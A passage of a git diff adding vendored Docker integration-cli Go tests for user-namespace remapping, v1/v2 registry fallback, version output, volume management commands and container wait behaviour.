+	c.Assert(err, checker.IsNil)
+	c.Assert(statNotExists.UID(), checker.Equals, uint32(uid), check.Commentf("Created directory not owned by remapped root UID"))
+	c.Assert(statNotExists.GID(), checker.Equals, uint32(gid), check.Commentf("Created directory not owned by remapped root GID"))
+
+	pid, err := s.d.Cmd("inspect", "--format={{.State.Pid}}", "userns")
+	c.Assert(err, checker.IsNil, check.Commentf("Could not inspect running container: out: %q", pid))
+	// check the uid and gid maps for the PID to ensure root is remapped
+	// (cmd = cat /proc/<pid>/uid_map | grep -E '0\s+9999\s+1')
+	out, rc1, err := runCommandPipelineWithOutput(
+		exec.Command("cat", "/proc/"+strings.TrimSpace(pid)+"/uid_map"),
+		exec.Command("grep", "-E", fmt.Sprintf("0[[:space:]]+%d[[:space:]]+", uid)))
+	c.Assert(rc1, checker.Equals, 0, check.Commentf("Didn't match uid_map: output: %s", out))
+
+	out, rc2, err := runCommandPipelineWithOutput(
+		exec.Command("cat", "/proc/"+strings.TrimSpace(pid)+"/gid_map"),
+		exec.Command("grep", "-E", fmt.Sprintf("0[[:space:]]+%d[[:space:]]+", gid)))
+	c.Assert(rc2, checker.Equals, 0, check.Commentf("Didn't match gid_map: output: %s", out))
+
+	// check that the touched file is owned by remapped uid:gid
+	stat, err := system.Stat(filepath.Join(tmpDir, "testfile"))
+	c.Assert(err, checker.IsNil)
+	c.Assert(stat.UID(), checker.Equals, uint32(uid), check.Commentf("Touched file not owned by remapped root UID"))
+	c.Assert(stat.GID(), checker.Equals, uint32(gid), check.Commentf("Touched file not owned by remapped root GID"))
+
+	// use host usernamespace
+	out, err = s.d.Cmd("run", "-d", "--name", "userns_skip", "--userns", "host", "busybox", "sh", "-c", "touch /goofy/testfile; top")
+	c.Assert(err, checker.IsNil, check.Commentf("Output: %s", out))
+	user = s.findUser(c, "userns_skip")
+	// userns are skipped, user is root
+	c.Assert(user, checker.Equals, "root")
+}
+
+// findUser finds the uid or name of the user of the first process that runs in a container
+func (s *DockerDaemonSuite) findUser(c *check.C, container string) string {
+	out, err := s.d.Cmd("top", container)
+	c.Assert(err, checker.IsNil, check.Commentf("Output: %s", out))
+	rows := strings.Split(out, "\n")
+	if len(rows) < 2 {
+		// No process rows founds
+		c.FailNow()
+	}
+	return strings.Fields(rows[1])[0]
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_v2_only_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_v2_only_test.go
new file mode 100644
index 0000000000..889936a062
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_v2_only_test.go
@@ -0,0 +1,125 @@
+package main
+
+import (
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"os"
+
+	"github.com/go-check/check"
+)
+
+func makefile(contents string) (string, func(), error) {
+	cleanup := func() {
+
+	}
+
+	f, err := ioutil.TempFile(".", "tmp")
+	if err != nil {
+		return "", cleanup, err
+	}
+	err = ioutil.WriteFile(f.Name(), []byte(contents), os.ModePerm)
+	if err != nil {
+		return "", cleanup, err
+	}
+
+	cleanup = func() {
+		err := os.Remove(f.Name())
+		if err != nil {
+			fmt.Println("Error removing tmpfile")
+		}
+	}
+	return f.Name(), cleanup, nil
+
+}
+
+// TestV2Only ensures that a daemon in v2-only mode does not
+// attempt to contact any v1 registry endpoints.
+func (s *DockerRegistrySuite) TestV2Only(c *check.C) {
+	reg, err := newTestRegistry(c)
+	c.Assert(err, check.IsNil)
+
+	reg.registerHandler("/v2/", func(w http.ResponseWriter, r *http.Request) {
+		w.WriteHeader(404)
+	})
+
+	reg.registerHandler("/v1/.*", func(w http.ResponseWriter, r *http.Request) {
+		c.Fatal("V1 registry contacted")
+	})
+
+	repoName := fmt.Sprintf("%s/busybox", reg.hostport)
+
+	err = s.d.Start("--insecure-registry", reg.hostport, "--disable-legacy-registry=true")
+	c.Assert(err, check.IsNil)
+
+	dockerfileName, cleanup, err := makefile(fmt.Sprintf("FROM %s/busybox", reg.hostport))
+	c.Assert(err, check.IsNil, check.Commentf("Unable to create test dockerfile"))
+	defer cleanup()
+
+	s.d.Cmd("build", "--file", dockerfileName, ".")
+
+	s.d.Cmd("run", repoName)
+	s.d.Cmd("login", "-u", "richard", "-p", "testtest", "-e", "testuser@testdomain.com", reg.hostport)
+	s.d.Cmd("tag", "busybox", repoName)
+	s.d.Cmd("push", repoName)
+	s.d.Cmd("pull", repoName)
+}
+
+// TestV1 starts a daemon in 'normal' mode
+// and ensure v1 endpoints are hit for the following operations:
+// login, push, pull, build & run
+func (s *DockerRegistrySuite) TestV1(c *check.C) {
+	reg, err := newTestRegistry(c)
+	c.Assert(err, check.IsNil)
+
+	v2Pings := 0
+	reg.registerHandler("/v2/", func(w http.ResponseWriter, r *http.Request) {
+		v2Pings++
+		// V2 ping 404 causes fallback to v1
+		w.WriteHeader(404)
+	})
+
+	v1Pings := 0
+	reg.registerHandler("/v1/_ping", func(w http.ResponseWriter, r *http.Request) {
+		v1Pings++
+	})
+
+	v1Logins := 0
+	reg.registerHandler("/v1/users/", func(w http.ResponseWriter, r *http.Request) {
+		v1Logins++
+	})
+
+	v1Repo := 0
+	reg.registerHandler("/v1/repositories/busybox/", func(w http.ResponseWriter, r *http.Request) {
+		v1Repo++
+	})
+
+	reg.registerHandler("/v1/repositories/busybox/images", func(w http.ResponseWriter, r *http.Request) {
+		v1Repo++
+	})
+
+	err = s.d.Start("--insecure-registry", reg.hostport, "--disable-legacy-registry=false")
+	c.Assert(err, check.IsNil)
+
+	dockerfileName, cleanup, err := makefile(fmt.Sprintf("FROM %s/busybox", reg.hostport))
+	c.Assert(err, check.IsNil, check.Commentf("Unable to create test dockerfile"))
+	defer cleanup()
+
+	s.d.Cmd("build", "--file", dockerfileName, ".")
+	c.Assert(v1Repo, check.Equals, 1, check.Commentf("Expected v1 repository access after build"))
+
+	repoName := fmt.Sprintf("%s/busybox", reg.hostport)
+	s.d.Cmd("run", repoName)
+	c.Assert(v1Repo, check.Equals, 2, check.Commentf("Expected v1 repository access after run"))
+
+	s.d.Cmd("login", "-u", "richard", "-p", "testtest", reg.hostport)
+	c.Assert(v1Logins, check.Equals, 1, check.Commentf("Expected v1 login attempt"))
+
+	s.d.Cmd("tag", "busybox", repoName)
+	s.d.Cmd("push", repoName)
+
+	c.Assert(v1Repo, check.Equals, 2)
+
+	s.d.Cmd("pull", repoName)
+	c.Assert(v1Repo, check.Equals, 3, check.Commentf("Expected v1 repository access after pull"))
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_version_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_version_test.go
new file mode 100644
index 0000000000..7672beb732
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_version_test.go
@@ -0,0 +1,58 @@
+package main
+
+import (
+	"strings"
+
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+)
+
+// ensure docker version works
+func (s *DockerSuite) TestVersionEnsureSucceeds(c *check.C) {
+	out, _ := dockerCmd(c, "version")
+	stringsToCheck := map[string]int{
+		"Client:":       1,
+		"Server:":       1,
+		" Version:":     2,
+		" API version:": 2,
+		" Go version:":  2,
+		" Git commit:":  2,
+		" OS/Arch:":     2,
+		" Built:":       2,
+	}
+
+	for k, v := range stringsToCheck {
+		c.Assert(strings.Count(out, k), checker.Equals, v, check.Commentf("The count of %v in %s does not match excepted", k, out))
+	}
+}
+
+// ensure the Windows daemon return the correct platform string
+func (s *DockerSuite) TestVersionPlatform_w(c *check.C) {
+	testRequires(c, DaemonIsWindows)
+	testVersionPlatform(c, "windows/amd64")
+}
+
+// ensure the Linux daemon return the correct platform string
+func (s *DockerSuite) TestVersionPlatform_l(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	testVersionPlatform(c, "linux")
+}
+
+func testVersionPlatform(c *check.C, platform string) {
+	out, _ := dockerCmd(c, "version")
+	expected := "OS/Arch:      " + platform
+
+	split := strings.Split(out, "\n")
+	c.Assert(len(split) >= 14, checker.Equals, true, check.Commentf("got %d lines from version", len(split)))
+
+	// Verify the second 'OS/Arch' matches the platform. Experimental has
+	// more lines of output than 'regular'
+	bFound := false
+	for i := 14; i < len(split); i++ {
+		if strings.Contains(split[i], expected) {
+			bFound = true
+			break
+		}
+	}
+	c.Assert(bFound, checker.Equals, true, check.Commentf("Could not find server '%s' in '%s'", expected, out))
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_volume_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_volume_test.go
new file mode 100644
index 0000000000..61a9413758
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_volume_test.go
@@ -0,0 +1,427 @@
+package main
+
+import (
+	"fmt"
+	"io/ioutil"
+	"os"
+	"os/exec"
+	"path/filepath"
+	"strings"
+
+	"github.com/docker/docker/pkg/integration/checker"
+	icmd "github.com/docker/docker/pkg/integration/cmd"
+	"github.com/go-check/check"
+)
+
+func (s *DockerSuite) TestVolumeCLICreate(c *check.C) {
+	dockerCmd(c, "volume", "create")
+
+	_, err := runCommand(exec.Command(dockerBinary, "volume", "create", "-d", "nosuchdriver"))
+	c.Assert(err, check.Not(check.IsNil))
+
+	// test using hidden --name option
+	out, _ := dockerCmd(c, "volume", "create", "--name=test")
+	name := strings.TrimSpace(out)
+	c.Assert(name, check.Equals, "test")
+
+	out, _ = dockerCmd(c, "volume", "create", "test2")
+	name = strings.TrimSpace(out)
+	c.Assert(name, check.Equals, "test2")
+}
+
+func (s *DockerSuite) TestVolumeCLIInspect(c *check.C) {
+	c.Assert(
+		exec.Command(dockerBinary, "volume", "inspect", "doesntexist").Run(),
+		check.Not(check.IsNil),
+		check.Commentf("volume inspect should error on non-existent volume"),
+	)
+
+	out, _ := dockerCmd(c, "volume", "create")
+	name := strings.TrimSpace(out)
+	out, _ = dockerCmd(c, "volume", "inspect", "--format={{ .Name }}", name)
+	c.Assert(strings.TrimSpace(out), check.Equals, name)
+
+	dockerCmd(c, "volume", "create", "test")
+	out, _ = dockerCmd(c, "volume", "inspect", "--format={{ .Name }}", "test")
+	c.Assert(strings.TrimSpace(out), check.Equals, "test")
+}
+
+func (s *DockerSuite) TestVolumeCLIInspectMulti(c *check.C) {
+	dockerCmd(c, "volume", "create", "test1")
+	dockerCmd(c, "volume", "create", "test2")
+	dockerCmd(c, "volume", "create", "not-shown")
+
+	result := dockerCmdWithResult("volume", "inspect", "--format={{ .Name }}", "test1", "test2", "doesntexist", "not-shown")
+	c.Assert(result, icmd.Matches, icmd.Expected{
+		ExitCode: 1,
+		Err:      "No such volume: doesntexist",
+	})
+
+	out := result.Stdout()
+	outArr := strings.Split(strings.TrimSpace(out), "\n")
+	c.Assert(len(outArr), check.Equals, 2, check.Commentf("\n%s", out))
+
+	c.Assert(out, checker.Contains, "test1")
+	c.Assert(out, checker.Contains, "test2")
+	c.Assert(out, checker.Not(checker.Contains), "not-shown")
+}
+
+func (s *DockerSuite) TestVolumeCLILs(c *check.C) {
+	prefix, _ := getPrefixAndSlashFromDaemonPlatform()
+	dockerCmd(c, "volume", "create", "aaa")
+
+	dockerCmd(c, "volume", "create", "test")
+
+	dockerCmd(c, "volume", "create", "soo")
+	dockerCmd(c, "run", "-v", "soo:"+prefix+"/foo", "busybox", "ls", "/")
+
+	out, _ := dockerCmd(c, "volume", "ls")
+	outArr := strings.Split(strings.TrimSpace(out), "\n")
+	c.Assert(len(outArr), check.Equals, 4, check.Commentf("\n%s", out))
+
+	assertVolList(c, out, []string{"aaa", "soo", "test"})
+}
+
+func (s *DockerSuite) TestVolumeLsFormat(c *check.C) {
+	dockerCmd(c, "volume", "create", "aaa")
+	dockerCmd(c, "volume", "create", "test")
+	dockerCmd(c, "volume", "create", "soo")
+
+	out, _ := dockerCmd(c, "volume", "ls", "--format", "{{.Name}}")
+	lines := strings.Split(strings.TrimSpace(string(out)), "\n")
+
+	expected := []string{"aaa", "soo", "test"}
+	var names []string
+	names = append(names, lines...)
+	c.Assert(expected, checker.DeepEquals, names, check.Commentf("Expected array with truncated names: %v, got: %v", expected, names))
+}
+
+func (s *DockerSuite) TestVolumeLsFormatDefaultFormat(c *check.C) {
+	dockerCmd(c, "volume", "create", "aaa")
+	dockerCmd(c, "volume", "create", "test")
+	dockerCmd(c, "volume", "create", "soo")
+
+	config := `{
+		"volumesFormat": "{{ .Name }} default"
+}`
+	d, err := ioutil.TempDir("", "integration-cli-")
+	c.Assert(err, checker.IsNil)
+	defer os.RemoveAll(d)
+
+	err = ioutil.WriteFile(filepath.Join(d, "config.json"), []byte(config), 0644)
+	c.Assert(err, checker.IsNil)
+
+	out, _ := dockerCmd(c, "--config", d, "volume", "ls")
+	lines := strings.Split(strings.TrimSpace(string(out)), "\n")
+
+	expected := []string{"aaa default", "soo default", "test default"}
+	var names []string
+	names = append(names, lines...)
+	c.Assert(expected, checker.DeepEquals, names, check.Commentf("Expected array with truncated names: %v, got: %v", expected, names))
+}
+
+// assertVolList checks volume retrieved with ls command
+// equals to expected volume list
+// note: out should be `volume ls [option]` result
+func assertVolList(c *check.C, out string, expectVols []string) {
+	lines := strings.Split(out, "\n")
+	var volList []string
+	for _, line := range lines[1 : len(lines)-1] {
+		volFields := strings.Fields(line)
+		// wrap all volume name in volList
+		volList = append(volList, volFields[1])
+	}
+
+	// volume ls should contains all expected volumes
+	c.Assert(volList, checker.DeepEquals, expectVols)
+}
+
+func (s *DockerSuite) TestVolumeCLILsFilterDangling(c *check.C) {
+	prefix, _ := getPrefixAndSlashFromDaemonPlatform()
+	dockerCmd(c, "volume", "create", "testnotinuse1")
+	dockerCmd(c, "volume", "create", "testisinuse1")
+	dockerCmd(c, "volume", "create", "testisinuse2")
+
+	// Make sure both "created" (but not started), and started
+	// containers are included in reference counting
+	dockerCmd(c, "run", "--name", "volume-test1", "-v", "testisinuse1:"+prefix+"/foo", "busybox", "true")
+	dockerCmd(c, "create", "--name", "volume-test2", "-v", "testisinuse2:"+prefix+"/foo", "busybox", "true")
+
+	out, _ := dockerCmd(c, "volume", "ls")
+
+	// No filter, all volumes should show
+	c.Assert(out, checker.Contains, "testnotinuse1\n", check.Commentf("expected volume 'testnotinuse1' in output"))
+	c.Assert(out, checker.Contains, "testisinuse1\n", check.Commentf("expected volume 'testisinuse1' in output"))
+	c.Assert(out, checker.Contains, "testisinuse2\n", check.Commentf("expected volume 'testisinuse2' in output"))
+
+	out, _ = dockerCmd(c, "volume", "ls", "--filter", "dangling=false")
+
+	// Explicitly disabling dangling
+	c.Assert(out, check.Not(checker.Contains), "testnotinuse1\n", check.Commentf("expected volume 'testnotinuse1' in output"))
+	c.Assert(out, checker.Contains, "testisinuse1\n", check.Commentf("expected volume 'testisinuse1' in output"))
+	c.Assert(out, checker.Contains, "testisinuse2\n", check.Commentf("expected volume 'testisinuse2' in output"))
+
+	out, _ = dockerCmd(c, "volume", "ls", "--filter", "dangling=true")
+
+	// Filter "dangling" volumes; only "dangling" (unused) volumes should be in the output
+	c.Assert(out, checker.Contains, "testnotinuse1\n", check.Commentf("expected volume 'testnotinuse1' in output"))
+	c.Assert(out, check.Not(checker.Contains), "testisinuse1\n", check.Commentf("volume 'testisinuse1' in output, but not expected"))
+	c.Assert(out, check.Not(checker.Contains), "testisinuse2\n", check.Commentf("volume 'testisinuse2' in output, but not expected"))
+
+	out, _ = dockerCmd(c, "volume", "ls", "--filter", "dangling=1")
+	// Filter "dangling" volumes; only "dangling" (unused) volumes should be in the output, dangling also accept 1
+	c.Assert(out, checker.Contains, "testnotinuse1\n", check.Commentf("expected volume 'testnotinuse1' in output"))
+	c.Assert(out, check.Not(checker.Contains), "testisinuse1\n", check.Commentf("volume 'testisinuse1' in output, but not expected"))
+	c.Assert(out, check.Not(checker.Contains), "testisinuse2\n", check.Commentf("volume 'testisinuse2' in output, but not expected"))
+
+	out, _ = dockerCmd(c, "volume", "ls", "--filter", "dangling=0")
+	// dangling=0 is same as dangling=false case
+	c.Assert(out, check.Not(checker.Contains), "testnotinuse1\n", check.Commentf("expected volume 'testnotinuse1' in output"))
+	c.Assert(out, checker.Contains, "testisinuse1\n", check.Commentf("expected volume 'testisinuse1' in output"))
+	c.Assert(out, checker.Contains, "testisinuse2\n", check.Commentf("expected volume 'testisinuse2' in output"))
+
+	out, _ = dockerCmd(c, "volume", "ls", "--filter", "name=testisin")
+	c.Assert(out, check.Not(checker.Contains), "testnotinuse1\n", check.Commentf("expected volume 'testnotinuse1' in output"))
+	c.Assert(out, checker.Contains, "testisinuse1\n", check.Commentf("execpeted volume 'testisinuse1' in output"))
+	c.Assert(out, checker.Contains, "testisinuse2\n", check.Commentf("expected volume 'testisinuse2' in output"))
+
+	out, _ = dockerCmd(c, "volume", "ls", "--filter", "driver=invalidDriver")
+	outArr := strings.Split(strings.TrimSpace(out), "\n")
+	c.Assert(len(outArr), check.Equals, 1, check.Commentf("%s\n", out))
+
+	out, _ = dockerCmd(c, "volume", "ls", "--filter", "driver=local")
+	outArr = strings.Split(strings.TrimSpace(out), "\n")
+	c.Assert(len(outArr), check.Equals, 4, check.Commentf("\n%s", out))
+
+	out, _ = dockerCmd(c, "volume", "ls", "--filter", "driver=loc")
+	outArr = strings.Split(strings.TrimSpace(out), "\n")
+	c.Assert(len(outArr), check.Equals, 4, check.Commentf("\n%s", out))
+
+}
+
+func (s *DockerSuite) TestVolumeCLILsErrorWithInvalidFilterName(c *check.C) {
+	out, _, err := dockerCmdWithError("volume", "ls", "-f", "FOO=123")
+	c.Assert(err, checker.NotNil)
+	c.Assert(out, checker.Contains, "Invalid filter")
+}
+
+func (s *DockerSuite) TestVolumeCLILsWithIncorrectFilterValue(c *check.C) {
+	out, _, err := dockerCmdWithError("volume", "ls", "-f", "dangling=invalid")
+	c.Assert(err, check.NotNil)
+	c.Assert(out, checker.Contains, "Invalid filter")
+}
+
+func (s *DockerSuite) TestVolumeCLIRm(c *check.C) {
+	prefix, _ := getPrefixAndSlashFromDaemonPlatform()
+	out, _ := dockerCmd(c, "volume", "create")
+	id := strings.TrimSpace(out)
+
+	dockerCmd(c, "volume", "create", "test")
+	dockerCmd(c, "volume", "rm", id)
+	dockerCmd(c, "volume", "rm", "test")
+
+	out, _ = dockerCmd(c, "volume", "ls")
+	outArr := strings.Split(strings.TrimSpace(out), "\n")
+	c.Assert(len(outArr), check.Equals, 1, check.Commentf("%s\n", out))
+
+	volumeID := "testing"
+	dockerCmd(c, "run", "-v", volumeID+":"+prefix+"/foo", "--name=test", "busybox", "sh", "-c", "echo hello > /foo/bar")
+	out, _, err := runCommandWithOutput(exec.Command(dockerBinary, "volume", "rm", "testing"))
+	c.Assert(
+		err,
+		check.Not(check.IsNil),
+		check.Commentf("Should not be able to remove volume that is in use by a container\n%s", out))
+
+	out, _ = dockerCmd(c, "run", "--volumes-from=test", "--name=test2", "busybox", "sh", "-c", "cat /foo/bar")
+	c.Assert(strings.TrimSpace(out), check.Equals, "hello")
+	dockerCmd(c, "rm", "-fv", "test2")
+	dockerCmd(c, "volume", "inspect", volumeID)
+	dockerCmd(c, "rm", "-f", "test")
+
+	out, _ = dockerCmd(c, "run", "--name=test2", "-v", volumeID+":"+prefix+"/foo", "busybox", "sh", "-c", "cat /foo/bar")
+	c.Assert(strings.TrimSpace(out), check.Equals, "hello", check.Commentf("volume data was removed"))
+	dockerCmd(c, "rm", "test2")
+
+	dockerCmd(c, "volume", "rm", volumeID)
+	c.Assert(
+		exec.Command("volume", "rm", "doesntexist").Run(),
+		check.Not(check.IsNil),
+		check.Commentf("volume rm should fail with non-existent volume"),
+	)
+}
+
+func (s *DockerSuite) TestVolumeCLINoArgs(c *check.C) {
+	out, _ := dockerCmd(c, "volume")
+	// no args should produce the cmd usage output
+	usage := "Usage:	docker volume COMMAND"
+	c.Assert(out, checker.Contains, usage)
+
+	// invalid arg should error and show the command usage on stderr
+	_, stderr, _, err := runCommandWithStdoutStderr(exec.Command(dockerBinary, "volume", "somearg"))
+	c.Assert(err, check.NotNil, check.Commentf(stderr))
+	c.Assert(stderr, checker.Contains, usage)
+
+	// invalid flag should error and show the flag error and cmd usage
+	_, stderr, _, err = runCommandWithStdoutStderr(exec.Command(dockerBinary, "volume", "--no-such-flag"))
+	c.Assert(err, check.NotNil, check.Commentf(stderr))
+	c.Assert(stderr, checker.Contains, usage)
+	c.Assert(stderr, checker.Contains, "unknown flag: --no-such-flag")
+}
+
+func (s *DockerSuite) TestVolumeCLIInspectTmplError(c *check.C) {
+	out, _ := dockerCmd(c, "volume", "create")
+	name := strings.TrimSpace(out)
+
+	out, exitCode, err := dockerCmdWithError("volume", "inspect", "--format='{{ .FooBar }}'", name)
+	c.Assert(err, checker.NotNil, check.Commentf("Output: %s", out))
+	c.Assert(exitCode, checker.Equals, 1, check.Commentf("Output: %s", out))
+	c.Assert(out, checker.Contains, "Template parsing error")
+}
+
+func (s *DockerSuite) TestVolumeCLICreateWithOpts(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+
+	dockerCmd(c, "volume", "create", "-d", "local", "test", "--opt=type=tmpfs", "--opt=device=tmpfs", "--opt=o=size=1m,uid=1000")
+	out, _ := dockerCmd(c, "run", "-v", "test:/foo", "busybox", "mount")
+
+	mounts := strings.Split(out, "\n")
+	var found bool
+	for _, m := range mounts {
+		if strings.Contains(m, "/foo") {
+			found = true
+			info := strings.Fields(m)
+			// tmpfs on <path> type tmpfs (rw,relatime,size=1024k,uid=1000)
+			c.Assert(info[0], checker.Equals, "tmpfs")
+			c.Assert(info[2], checker.Equals, "/foo")
+			c.Assert(info[4], checker.Equals, "tmpfs")
+			c.Assert(info[5], checker.Contains, "uid=1000")
+			c.Assert(info[5], checker.Contains, "size=1024k")
+		}
+	}
+	c.Assert(found, checker.Equals, true)
+}
+
+func (s *DockerSuite) TestVolumeCLICreateLabel(c *check.C) {
+	testVol := "testvolcreatelabel"
+	testLabel := "foo"
+	testValue := "bar"
+
+	out, _, err := dockerCmdWithError("volume", "create", "--label", testLabel+"="+testValue, testVol)
+	c.Assert(err, check.IsNil)
+
+	out, _ = dockerCmd(c, "volume", "inspect", "--format={{ .Labels."+testLabel+" }}", testVol)
+	c.Assert(strings.TrimSpace(out), check.Equals, testValue)
+}
+
+func (s *DockerSuite) TestVolumeCLICreateLabelMultiple(c *check.C) {
+	testVol := "testvolcreatelabel"
+
+	testLabels := map[string]string{
+		"foo": "bar",
+		"baz": "foo",
+	}
+
+	args := []string{
+		"volume",
+		"create",
+		testVol,
+	}
+
+	for k, v := range testLabels {
+		args = append(args, "--label", k+"="+v)
+	}
+
+	out, _, err := dockerCmdWithError(args...)
+	c.Assert(err, check.IsNil)
+
+	for k, v := range testLabels {
+		out, _ = dockerCmd(c, "volume", "inspect", "--format={{ .Labels."+k+" }}", testVol)
+		c.Assert(strings.TrimSpace(out), check.Equals, v)
+	}
+}
+
+func (s *DockerSuite) TestVolumeCLILsFilterLabels(c *check.C) {
+	testVol1 := "testvolcreatelabel-1"
+	out, _, err := dockerCmdWithError("volume", "create", "--label", "foo=bar1", testVol1)
+	c.Assert(err, check.IsNil)
+
+	testVol2 := "testvolcreatelabel-2"
+	out, _, err = dockerCmdWithError("volume", "create", "--label", "foo=bar2", testVol2)
+	c.Assert(err, check.IsNil)
+
+	out, _ = dockerCmd(c, "volume", "ls", "--filter", "label=foo")
+
+	// filter with label=key
+	c.Assert(out, checker.Contains, "testvolcreatelabel-1\n", check.Commentf("expected volume 'testvolcreatelabel-1' in output"))
+	c.Assert(out, checker.Contains, "testvolcreatelabel-2\n", check.Commentf("expected volume 'testvolcreatelabel-2' in output"))
+
+	out, _ = dockerCmd(c, "volume", "ls", "--filter", "label=foo=bar1")
+
+	// filter with label=key=value
+	c.Assert(out, checker.Contains, "testvolcreatelabel-1\n", check.Commentf("expected volume 'testvolcreatelabel-1' in output"))
+	c.Assert(out, check.Not(checker.Contains), "testvolcreatelabel-2\n", check.Commentf("expected volume 'testvolcreatelabel-2 in output"))
+
+	out, _ = dockerCmd(c, "volume", "ls", "--filter", "label=non-exist")
+	outArr := strings.Split(strings.TrimSpace(out), "\n")
+	c.Assert(len(outArr), check.Equals, 1, check.Commentf("\n%s", out))
+
+	out, _ = dockerCmd(c, "volume", "ls", "--filter", "label=foo=non-exist")
+	outArr = strings.Split(strings.TrimSpace(out), "\n")
+	c.Assert(len(outArr), check.Equals, 1, check.Commentf("\n%s", out))
+}
+
+func (s *DockerSuite) TestVolumeCLIRmForceUsage(c *check.C) {
+	out, _ := dockerCmd(c, "volume", "create")
+	id := strings.TrimSpace(out)
+
+	dockerCmd(c, "volume", "rm", "-f", id)
+	dockerCmd(c, "volume", "rm", "--force", "nonexist")
+
+	out, _ = dockerCmd(c, "volume", "ls")
+	outArr := strings.Split(strings.TrimSpace(out), "\n")
+	c.Assert(len(outArr), check.Equals, 1, check.Commentf("%s\n", out))
+}
+
+func (s *DockerSuite) TestVolumeCLIRmForce(c *check.C) {
+	testRequires(c, SameHostDaemon, DaemonIsLinux)
+
+	name := "test"
+	out, _ := dockerCmd(c, "volume", "create", name)
+	id := strings.TrimSpace(out)
+	c.Assert(id, checker.Equals, name)
+
+	out, _ = dockerCmd(c, "volume", "inspect", "--format", "{{.Mountpoint}}", name)
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "")
+	// Mountpoint is in the form of "/var/lib/docker/volumes/.../_data", removing `/_data`
+	path := strings.TrimSuffix(strings.TrimSpace(out), "/_data")
+	out, _, err := runCommandWithOutput(exec.Command("rm", "-rf", path))
+	c.Assert(err, check.IsNil)
+
+	dockerCmd(c, "volume", "rm", "-f", "test")
+	out, _ = dockerCmd(c, "volume", "ls")
+	c.Assert(out, checker.Not(checker.Contains), name)
+	dockerCmd(c, "volume", "create", "test")
+	out, _ = dockerCmd(c, "volume", "ls")
+	c.Assert(out, checker.Contains, name)
+}
+
+func (s *DockerSuite) TestVolumeCliInspectWithVolumeOpts(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+
+	// Without options
+	name := "test1"
+	dockerCmd(c, "volume", "create", "-d", "local", name)
+	out, _ := dockerCmd(c, "volume", "inspect", "--format={{ .Options }}", name)
+	c.Assert(strings.TrimSpace(out), checker.Contains, "map[]")
+
+	// With options
+	name = "test2"
+	k1, v1 := "type", "tmpfs"
+	k2, v2 := "device", "tmpfs"
+	k3, v3 := "o", "size=1m,uid=1000"
+	dockerCmd(c, "volume", "create", "-d", "local", name, "--opt", fmt.Sprintf("%s=%s", k1, v1), "--opt", fmt.Sprintf("%s=%s", k2, v2), "--opt", fmt.Sprintf("%s=%s", k3, v3))
+	out, _ = dockerCmd(c, "volume", "inspect", "--format={{ .Options }}", name)
+	c.Assert(strings.TrimSpace(out), checker.Contains, fmt.Sprintf("%s:%s", k1, v1))
+	c.Assert(strings.TrimSpace(out), checker.Contains, fmt.Sprintf("%s:%s", k2, v2))
+	c.Assert(strings.TrimSpace(out), checker.Contains, fmt.Sprintf("%s:%s", k3, v3))
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_wait_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_wait_test.go
new file mode 100644
index 0000000000..961aef5525
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_wait_test.go
@@ -0,0 +1,97 @@
+package main
+
+import (
+	"bytes"
+	"os/exec"
+	"strings"
+	"time"
+
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+)
+
+// non-blocking wait with 0 exit code
+func (s *DockerSuite) TestWaitNonBlockedExitZero(c *check.C) {
+	out, _ := dockerCmd(c, "run", "-d", "busybox", "sh", "-c", "true")
+	containerID := strings.TrimSpace(out)
+
+	err := waitInspect(containerID, "{{.State.Running}}", "false", 30*time.Second)
+	c.Assert(err, checker.IsNil) //Container should have stopped by now
+
+	out, _ = dockerCmd(c, "wait", containerID)
+	c.Assert(strings.TrimSpace(out), checker.Equals, "0", check.Commentf("failed to set up container, %v", out))
+
+}
+
+// blocking wait with 0 exit code
+func (s *DockerSuite) TestWaitBlockedExitZero(c *check.C) {
+	// Windows busybox does not support trap in this way, not sleep with sub-second
+	// granularity. It will always exit 0x40010004.
+	testRequires(c, DaemonIsLinux)
+	out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "trap 'exit 0' TERM; while true; do usleep 10; done")
+	containerID := strings.TrimSpace(out)
+
+	c.Assert(waitRun(containerID), checker.IsNil)
+
+	chWait := make(chan string)
+	go func() {
+		chWait <- ""
+		out, _, _ := runCommandWithOutput(exec.Command(dockerBinary, "wait", containerID))
+		chWait <- out
+	}()
+
+	<-chWait // make sure the goroutine is started
+	time.Sleep(100 * time.Millisecond)
+	dockerCmd(c, "stop", containerID)
+
+	select {
+	case status := <-chWait:
+		c.Assert(strings.TrimSpace(status), checker.Equals, "0", check.Commentf("expected exit 0, got %s", status))
+	case <-time.After(2 * time.Second):
+		c.Fatal("timeout waiting for `docker wait` to exit")
+	}
+
+}
+
+// non-blocking wait with random exit code
+func (s *DockerSuite) TestWaitNonBlockedExitRandom(c *check.C) {
+	out, _ := dockerCmd(c, "run", "-d", "busybox", "sh", "-c", "exit 99")
+	containerID := strings.TrimSpace(out)
+
+	err := waitInspect(containerID, "{{.State.Running}}", "false", 30*time.Second)
+	c.Assert(err, checker.IsNil) //Container should have stopped by now
+	out, _ = dockerCmd(c, "wait", containerID)
+	c.Assert(strings.TrimSpace(out), checker.Equals, "99", check.Commentf("failed to set up container, %v", out))
+
+}
+
+// blocking wait with random exit code
+func (s *DockerSuite) TestWaitBlockedExitRandom(c *check.C) {
+	// Cannot run on Windows as trap in Windows busybox does not support trap in this way.
+	testRequires(c, DaemonIsLinux)
